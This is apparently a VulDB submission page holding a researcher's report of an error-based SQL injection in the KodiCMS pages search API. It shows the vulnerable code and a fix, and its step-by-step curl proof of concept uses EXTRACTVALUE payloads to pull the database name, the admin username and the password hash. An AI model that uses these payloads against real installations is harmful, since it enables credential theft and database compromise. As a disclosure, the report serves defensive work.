إرسال #718289: KodiCMS https://github.com/KodiCMS-Kohana/cms 13.82.135 SQL Injectionالمعلومات

عنوانKodiCMS https://github.com/KodiCMS-Kohana/cms 13.82.135 SQL Injection
الوصف# SQL Injection Vulnerability in KodiCMS ≤ 13.82.135 **BUG_Author:** Security Researcher **Affected Version:** KodiCMS ≤ 13.82.135 (all versions) **Vendor:** [KodiCMS-Kohana GitHub Repository](https://github.com/KodiCMS-Kohana/cms) **Software:** [KodiCMS](https://github.com/KodiCMS-Kohana/cms) **Vulnerability Type:** SQL Injection (Error-based) **Vulnerability Files:** - `cms/modules/pages/classes/kodicms/model/page.php` (Line 535) - `cms/modules/tags/classes/kodicms/model/tag.php` (Line 29) --- ## Description A SQL Injection vulnerability exists in KodiCMS, a content management system based on the Kohana framework. The vulnerability is located in the `like()` function of the `Model_Page` class, which improperly uses `DB::expr()` to handle user-supplied input without proper sanitization. ### Vulnerable Code In the file `cms/modules/pages/classes/kodicms/model/page.php`, line 525-535: ```php public function like($keyword) { return $this ->where_open() ->or_where(DB::expr('LOWER(title)'), 'like', '%:query%') ->or_where('slug', 'like', '%:query%') ->or_where('breadcrumb', 'like', '%:query%') ->or_where('meta_title', 'like', '%:query%') ->or_where('meta_keywords', 'like', '%:query%') ->where_close() ->param(':query', DB::expr($keyword)); // VULNERABLE: User input passed directly to DB::expr() } ``` ### Root Cause The `DB::expr()` function in the Kohana framework is designed to create raw, unescaped SQL expressions. According to Kohana's documentation: "A database expression is taken as direct input and no escaping is performed." The developer incorrectly passed user-controlled input (`$keyword`) directly to `DB::expr()`, bypassing all SQL escaping mechanisms and allowing attackers to inject arbitrary SQL code. ### Attack Vector 1. An authenticated user or anyone with a valid API key can access the pages search API endpoint. 2. The search parameter is passed to the `like()` function without sanitization. 3. By crafting malicious SQL payloads, an attacker can extract sensitive data from the database using error-based SQL injection techniques. --- ## Affected Endpoint **API Endpoint:** `/backend/api-pages.search` **HTTP Method:** GET **Required Parameters:** - `api_key` - Valid API key (or authenticated session) - `search` - Search query (vulnerable parameter) **Vulnerable Code Path:** ``` User Input → Controller_API_Pages::get_search() → Model_Page::like($query) → DB::expr($keyword) → SQL Execution ``` --- ## Proof of Concept ### Prerequisites - KodiCMS installed and running - Valid API key or authenticated session - API mode enabled (`api.mode = 'yes'` in config) ### Step 1: Verify Normal Search Functionality ```bash curl -s "http://<target-ip>/backend/api-pages.search?api_key=<API_KEY>&search=test" ``` Expected Response: Empty or matching pages list. ### Step 2: Test SQL Injection (Boolean-based) ```bash curl -s "http://<target-ip>/backend/api-pages.search?api_key=<API_KEY>&search=%27%20OR%20%271%27%3D%271" ``` **Payload (decoded):** `' OR '1'='1` Expected Response: All pages returned (bypassing search condition). ### Step 3: Extract Database Name (Error-based) ```bash curl -s "http://<target-ip>/backend/api-pages.search?api_key=<API_KEY>&search=%27)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20database())))%23" ``` **Payload (decoded):** `') AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT database())))#` Expected Response: ```json {"code":1105,"message":"XPATH syntax error: '~kodicms'..."} ``` ### Step 4: Extract MySQL Version ```bash curl -s "http://<target-ip>/backend/api-pages.search?api_key=<API_KEY>&search=%27)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20version())))%23" ``` **Payload (decoded):** `') AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))#` Expected Response: ```json {"code":1105,"message":"XPATH syntax error: '~5.7.44'..."} ``` ### Step 5: Extract Admin Username ```bash curl -s "http://<target-ip>/backend/api-pages.search?api_key=<API_KEY>&search=%27)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20users%20LIMIT%201)))%23" ``` **Payload (decoded):** `') AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT username FROM users LIMIT 1)))#` Expected Response: ```json {"code":1105,"message":"XPATH syntax error: '~admin'..."} ``` ### Step 6: Extract Admin Password Hash ```bash curl -s "http://<target-ip>/backend/api-pages.search?api_key=<API_KEY>&search=%27)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20users%20LIMIT%201)))%23" ``` **Payload (decoded):** `') AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT password FROM users LIMIT 1)))#` Expected Response: ```json {"code":1105,"message":"XPATH syntax error: '~bf8e46d9d102cf1f7e674aebd7321f2'..."} ``` Note: Due to EXTRACTVALUE length limitation, use SUBSTRING to extract the full hash: ```bash curl -s "http://<target-ip>/backend/api-pages.search?api_key=<API_KEY>&search=%27)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20SUBSTRING(password,32,32)%20FROM%20users%20LIMIT%201)))%23" ``` ### Step 7: Extract All Table Names ```bash curl -s "http://<target-ip>/backend/api-pages.search?api_key=<API_KEY>&search=%27)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20GROUP_CONCAT(table_name)%20FROM%20information_schema.tables%20WHERE%20table_schema%3Ddatabase())))%23" ``` --- ## Impact An attacker exploiting this vulnerability can: 1. **Data Exfiltration:** Extract sensitive data from the entire database including user credentials, API keys, page content, and configuration settings. 2. **Authentication Bypass:** Retrieve admin password hashes which can be cracked offline to gain administrative access. 3. **Information Disclosure:** Enumerate database structure, table names, and column names for further attacks. 4. **Potential Remote Code Execution:** In certain MySQL configurations, SQL injection can lead to file read/write operations or command execution. --- ## Remediation ### Recommended Fix Replace the vulnerable code in `cms/modules/pages/classes/kodicms/model/page.php`: **Before (Vulnerable):** ```php ->param(':query', DB::expr($keyword)); ``` **After (Fixed):** ```php ->param(':query', strtolower($keyword)); ``` ### Additional Recommendations 1. Remove `DB::expr()` wrapper from user-controlled input in all locations. 2. Implement input validation and sanitization for all user inputs. 3. Use parameterized queries consistently throughout the application. 4. Apply the principle of least privilege for database accounts. 5. Enable Web Application Firewall (WAF) rules to detect SQL injection attempts. --- ## Timeline - **Discovery Date:** 2025-12-17 - **Vendor Notification:** Pending - **Public Disclosure:** Pending --- ## References - [Kohana DB::expr() Documentation](https://kohanaframework.org/3.3/guide/database/query/builder#database-expressions) - [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection) - [CWE-89: SQL Injection](https://cwe.mitre.org/data/definitions/89.html)
المستخدم
 hiro (UID 93548)
ارسال18/12/2025 03:24 AM (6 أشهر منذ)
الاعتدال31/12/2025 10:17 AM (13 days later)
الحالةتمت الموافقة
إدخال VulDB339161 [Kohana KodiCMS حتى 13.82.135 Search API Endpoint page.php like keyword حقن SQL]
النقاط17

التالي نظرة عامة السابق

Do you want to use VulDB in your project?

Use the official API to access entries easily!